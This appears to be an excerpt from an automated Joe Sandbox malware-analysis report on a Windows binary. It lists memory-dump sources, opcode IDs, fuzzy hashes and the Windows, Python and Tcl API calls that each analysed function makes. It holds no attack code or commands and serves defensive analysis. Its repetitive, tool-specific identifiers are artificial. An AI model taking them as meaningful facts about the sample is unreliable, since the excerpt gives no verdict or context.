                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                  • Opcode ID: 13ca75d532394eb5dd34a4634b4a0a9fa9f510c5e6e64636f920fa999b5c02b4
                                                                                                                                                                  • Instruction ID: 2cde29e0d7c62d59738e9bba067541559e27a564004f52a75a2aa519c8185c2d
                                                                                                                                                                  • Opcode Fuzzy Hash: 13ca75d532394eb5dd34a4634b4a0a9fa9f510c5e6e64636f920fa999b5c02b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 62218621B0C65165FA759B36A9047BAA651FF45BD8F8C44B0DE0D877CADE7DE081C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                  • Instruction ID: 51178b44efaede3e4e49037e6a1a880cd6dd35f58b245a36aa54042dd8a9664c
                                                                                                                                                                  • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                  • Instruction Fuzzy Hash: FB31AD22E18642A7F725AB3D98413BD2650FF51BA4F5101B5EA2D837DACFBCE442C321
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                  • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                  • Instruction ID: b97b162001098a0d3c7c2f4c1fd85375abab0d468968d46d8b3b1a7ebc7ab250
                                                                                                                                                                  • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                  • Instruction Fuzzy Hash: B921AC36A167069AEB249F78C4412EC33A0FB44318F5406BAD72C86BC9EF38D486CB50
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                  • Instruction ID: 984a404bb94b954902b41c485cb409979f1ab9b72b582eb637424909e4a71bb4
                                                                                                                                                                  • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E117221E1D68191EA709F69940027EA2A4FF96B80F4444B1EF4CD7BDECF3CD9568744
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                  • Instruction ID: b3a918e02be0fa1d3108c34ee9a8faed2bcfedea0e2400f2a863cdcc12a80b37
                                                                                                                                                                  • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                  • Instruction Fuzzy Hash: 86219232A18A8296DB728F28E44177976A0EB98B95F544234EA5DC77EDDF3CD401CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                  • Instruction ID: 0e9434739f93ba86557cd647b26fb1fdb4877b31e6c570a190ab573cdf57f280
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                  • Instruction Fuzzy Hash: 0501C021A0C78251EA64DB769900079A6A5FF95FE4F4846B1EE6C93BDEDF3CE5028300
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270007702.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2269966833.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270202656.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270256702.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8b8300000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __vcrt_initialize_locks__vcrt_initialize_winapi_thunks
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2444027679-0
                                                                                                                                                                  • Opcode ID: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                  • Instruction ID: ef6b4eab6556568d4ed8887d9687d7f963a82f9b3ea5fd4c553fa640225c149f
                                                                                                                                                                  • Opcode Fuzzy Hash: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                  • Instruction Fuzzy Hash: 08114921E09A0281FE615B2CE5903B96290AF08BE0F5C4139DB6D027D5DF2CF842C308
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9
                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(?,00007FF690015C06,?,00007FF69001308E), ref: 00007FF6900181C2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2592636585-0
                                                                                                                                                                  • Opcode ID: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                                                                                                                                  • Instruction ID: 14d405c6adbdee7fe211dd424e6ec3afce2a49180b8f22968e08e8d9e1a695b9
                                                                                                                                                                  • Opcode Fuzzy Hash: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 98D0C201F2424191FAA4AB7BBA465796152DFCDBC4F888034EF1C83B4EDC3CC0910B00
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF69001FFB0,?,?,?,00007FF69002161A,?,?,?,?,?,00007FF690022E09), ref: 00007FF69002C94A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                  • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                  • Instruction ID: 08999c98d486a7a6c1b3ea8ee17394ec9f43ee3abe5a5cc644e4f4fca7e2f6ad
                                                                                                                                                                  • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF01C11F19287A5FE7567BA5859B791280DF88BA0F4846B0DD2EC67CDDE2CE5828210
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017A1B
                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017A9E
                                                                                                                                                                  • DeleteFileW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ABD
                                                                                                                                                                  • FindNextFileW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ACB
                                                                                                                                                                  • FindClose.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ADC
                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017AE5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                  • String ID: %s\*
                                                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                                                  • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                  • Instruction ID: 502c55dc6f1132b9c735b8fea1043c38e0679fed4e087c35def80b6b0518c691
                                                                                                                                                                  • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                  • Instruction Fuzzy Hash: A4416F21A0C942A5EAB09B34E4545BD6361FF98758F800672E69DC37DCDF7CD68AC701
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                  • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                  • Instruction ID: 6e3b296df5b792b3ce2b770a0103b577d5eee7f756f0895939c08f0f5dc19ae8
                                                                                                                                                                  • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                  • Instruction Fuzzy Hash: 23312A72608A8196EB709F64E890BEE7361FB88748F04417ADB4D87B99DF38D548C710
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                  • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                  • Instruction ID: 7571340e09dacc5694d6e7fe316bb15b811628a7ed369b3f96eaa17f06741a37
                                                                                                                                                                  • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                  • Instruction Fuzzy Hash: 24314E36A18B8196DB60CF39E8406AE73A4FB88758F540275EA9D87B99DF3CD145CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                  • Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                                                                                  • Instruction ID: 78469d1220ff25ba6e4145801ff1408b35cefc5135df6680f8017bc7bc318677
                                                                                                                                                                  • Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                                                                                  • Instruction Fuzzy Hash: 5BB1F322B1A69291EA72DB75D420ABD63A0EB48BE4F445171EE5E87BCDDF3CE451C300
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900150C0
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015101
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015126
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF69001514B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015173
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF69001519B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900151C3
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900151EB
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015213
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                  • API String ID: 190572456-2007157414
                                                                                                                                                                  • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                  • Instruction ID: 7648b33edeb82bdd0ab73a370428ccc24d8207c64474ae216970e21b1c2e257d
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                  • Instruction Fuzzy Hash: DF12A465D0EB03F1FA7A9BB5A8509B423A1EF0C749B9414B5D80ED63A8EF3CF5489340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                  • API String ID: 190572456-3427451314
                                                                                                                                                                  • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                  • Instruction ID: 7c3918bf6be1ac06e90ac3ed181f4d6d5e203b6e854cd0e62e806de96d163347
                                                                                                                                                                  • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                  • Instruction Fuzzy Hash: 54E1A96890DB03B1FA7AAB75B8505B523A5EF08758F9411B6D85EC23ACEF3CE558D300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
